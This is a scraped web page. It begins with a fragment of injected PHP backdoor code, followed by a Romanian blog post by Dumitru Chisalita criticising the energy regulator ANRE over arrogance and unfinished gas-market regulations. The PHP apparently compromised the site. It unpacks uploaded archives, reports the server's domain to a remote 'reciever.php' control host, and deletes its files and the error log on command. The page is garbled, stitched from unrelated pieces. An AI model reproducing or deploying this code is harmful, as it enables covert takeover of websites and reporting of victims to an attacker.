'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> Pilula de Energie: Orgolii versus schimbare | Dumitru Chisalita

Rss

Pilula de Energie: Orgolii versus schimbare

pilulaRăzvan Nicolescu declara zilele trecute, în cadrul unei conferințe, faptul că, în cadrul ANRE, prea puțini oameni își fac treaba, deși există mai mulți angajați decât în trecut. Reprezentanți ai ANRE au reacționat rapid “ANRE este atacată în mod repetat de reprezentanții companiei Deloitte Romania ceea ce poate afecta integritatea și autonomia instituției“.

Doresc să precizez că ANRE ca orice altă entitate, are părți bune și părți mai puțin bune. Echipa de eficiență energetică, deși relativ marginalizată, este lăudabilă pentru efortul pe care-l face în a aduce în prim plan cea mai importantă problemă a României – risipa . Angajații ANRE din teritoriu, adesea lăsați singuri în fața unor “baroni” și “băieți deștepți”, luptă la propriu în a ridica sigla ANRE la nivelul cuvenit.

Nu pot însă să nu critic, și să-i dau dreptate lui Răzvan Nicolescu, atunci când ne îndreptăm privirile asupra altor activități, asa cum este activitatea din sectorul gazelor naturale.

Puternice imperii, civilizații întregi etc., s-au prăbușit într-un termen extrem de scurt atunci când aroganța și orbirea a luat locul rațiunii și deschiderii. ANRE, ca și alte entități din acest sector, sunt dominate în momentul de față de o puternică aroganță, ceea ce-i face să acționeze orbește. În această organizație, ca și în cazul imperiilor de odinioară, majoritatea simte că ceva nu este în ordine, dar instinctul lor este de a apăra modurile în care se fac astăzi lucrurile, în loc de a se îndoi  de ele, nemaivorbind de a-și dezvolta capacitatea de a schimba aceste lucruri.

Recunoașterea după 5 ani a erorii de obligare a furnizorilor de a înmagazina gaze naturale, justificarea modului de stabilire a tarifelor și prețurilor reglementate, nerealizarea a peste 30 de acte normative impuse de legea gazelor, a altor 10 acte expirate, a altor 10 acte noi, absolut necesare pentru a asigura funcționarea pieței de gaze sunt elemente concrete și imputabile.

Nu avem nevoie decât de noi înşine pentru a ne înfrânge pornirile, dar uneori avem nevoie de alţii pentru a discerne ceea ce este îngăduit să urmăm; la aceasta foloseşte prietenia unui om înţelept, care vede pentru noi, dintr-un alt punct de vedere, ceea ce ne interesează să cunoaştem bine (Jean-Jacques Rousseau)